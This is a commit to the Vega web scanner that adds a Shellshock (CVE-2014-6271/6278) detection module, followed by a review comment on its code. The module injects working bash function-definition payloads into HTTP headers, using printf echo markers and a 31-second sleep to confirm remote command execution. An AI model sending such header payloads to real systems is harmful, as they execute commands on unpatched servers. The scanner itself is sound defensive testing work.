Merge branch 'develop' of https://github.com/tdzmont/Vega into develop
Conflicts:
	scripts/scanner/modules/injection/bash-inject.js
dma committed Oct 14, 2014
2 parents 30dbd7e + 275c2ca commit e786a9b
Showing 2 changed files with 170 additions and 0 deletions.
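--- a/scripts/scanner/modules/injection/bash-inject.js
+++ b/scripts/scanner/modules/injection/bash-inject.js
@@ -0,0 +1,169 @@
+var module = {
+name: "Bash Environment Variable Blind OS Injection (CVE-2014-6271, CVE-2014-6278) Checks",
+category: "Injection Modules",
+differential: true
+};
+
+var alteredRequests = [];
+
+var sleepPayload = "() { :;}; /bin/sleep 31";
+var payload6271 = "() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'";
+var payload6278 = "() { _; } >_[\$(\$())] { printf 'Content-Type: text/html\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'; }";
+
+alteredRequests.push({
+payload: payload6271,
+header: "EchoAttackFirst",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6271,
+header: "",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6271,
+header: "Referer",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6271,
+header: "Accept-Language",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6271,
+header: "Cookie",
+check: "echo"
+});
+
+alteredRequests.push({
+payload: payload6278,
+header: "User-Agent",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6278,
+header: "",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6278,
+header: "Referer",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6278,
+header: "Accept-Language",
+check: "echo"
+});
+alteredRequests.push({
+payload: payload6278,
+header: "Cookie",
+check: "echo"
+});
+
+
+alteredRequests.push({
+payload: sleepPayload,
+header: "",
+check: "timeout"
+});
+alteredRequests.push({
+payload: sleepPayload,
+header: "User-Agent",
+check: "timeout"
+});
+alteredRequests.push({
+payload: sleepPayload,
+header: "Referer",
+check: "timeout"
+});
+alteredRequests.push({
+payload: sleepPayload,
+header: "Accept-Language",
+check: "timeout"
+});
+alteredRequests.push({
+payload: sleepPayload,
+header: "Cookie",
+check: "timeout"
+});
+
+function initialize(ctx) {
+var ps = ctx.getPathState();
+var req = ps.createAlteredRequest("", true);
+req.addHeader("User-Agent","() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'");
+ctx.submitRequest(req, process, 0);
+
+}
+
+var checkTiming = function(ctx, currentIndex) {
+if (ctx.getSavedResponse(currentIndex).milliseconds > 30000) {
+return true;
+}
+return false;
+};
+
+
+var checkOutput = function(ctx, currentIndex) {
+if (ctx.getSavedResponse(currentIndex).bodyAsString.indexOf("VEGA123 vulnerable VEGA123") > -1) {
+return true;
+}
+return false;
+};
+
+function process(req, res, ctx) {
+if (ctx.hasModuleFailed()) return;
+if (res.fetchFail) {
+ctx.error(req, res, "During Bash Environment Variable injection checks");
+ctx.setModuleFailed();
+return;
+}
+var ps = ctx.getPathState();
+
+var currentIndex = ctx.getCurrentIndex();
+ctx.addRequestResponse(req, res);
+ctx.incrementResponseCount();
+
+var type="";
+if (alteredRequests[currentIndex].check == "echo"){
+var detected = checkOutput(ctx, currentIndex); /* check for echod output first */
+type = detected ? "Executed Commands on Host" : "";
+}
+else{
+detected = checkTiming(ctx, currentIndex); /* check for timing attack */
+type = detected ? "Blind Timing Analysis Checks" : "";
+}
+if (detected){
+var uri = String(req.requestLine.uri);
+var uripart = uri.replace(/\?.*/, "");
+if ((uripart.length > 2) && (uripart.slice(-1) == "/")) {
+uripart = uripart.substring(0, uripart.length-1);
+}
+
+ctx.alert("vinfo-bash-inject", ctx.getSavedRequest(currentIndex), ctx.getSavedResponse(currentIndex), {
+output: res.bodyAsString,
+key: "vinfo-shell-inject:" + uripart + ":" + ps.getFuzzableParameter().name,
+resource: uripart,
+detectiontype: type,
+param: ps.getFuzzableParameter().name
+});
+} else {
+if (currentIndex + 1 < alteredRequests.length) {
+if (alteredRequests[currentIndex + 1].header == "") {
+req = ps.createRequest();
+req = ps.createAlteredRequest(alteredRequests[currentIndex + 1].payload, false);
+} else {
+req = ps.createRequest();
+req.addHeader(alteredRequests[currentIndex + 1].header, alteredRequests[currentIndex + 1].payload);
+}
+ctx.submitRequest(req, process, currentIndex + 1);
+var submitted=currentIndex+1;
+}
+}
+
+if (ctx.allResponsesReceived()) {
+ps.decrementFuzzCounter();
+}
+}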
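Review bot: The request table and the first request sent have drifted apart: initialize() submits index 0 with a hard-coded copy of the CVE-2014-6271 string in User-Agent instead of referencing `payload6271`, while alteredRequests[0], the entry process() reads for currentIndex 0, carries the placeholder header name "EchoAttackFirst" that is never put on the wire. Suggest `req.addHeader("User-Agent", payload6271);` in initialize and `header: "User-Agent"` for the first entry so the table documents what was actually submitted. In process(), `req = ps.createRequest();` on the `header == ""` branch is immediately overwritten by the createAlteredRequest call on the next line, and `var submitted` is assigned but never read; both can be dropped. checkTiming flags any response slower than 30 s without comparing against the path's untampered baseline latency, so a slow or overloaded host yields a false "Blind Timing Analysis Checks" alert; a comment stating that assumption, or a baseline request to gate it, would make the detection's confidence explicit.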

1 change: 1 addition & 0 deletions xml/alerts/vinfo-bash-inject.xml
Expand Up @@ -19,6 +19,7 @@
<references>
<url address="https://access.redhat.com/articles/1200223">Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271, CVE-2014-7169) (Red Hat)</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271">CVE-2014-6271</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278">CVE-2014-6278</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169">CVE-2014-7169</url>
<url address="https://www.owasp.org/index.php/Command_Injection">Command Injection (OWASP)</url>
<url address="https://www.owasp.org/index.php/Reviewing_Code_for_OS_Injection">Reviewing Code for OS Injection (OWASP)</url>
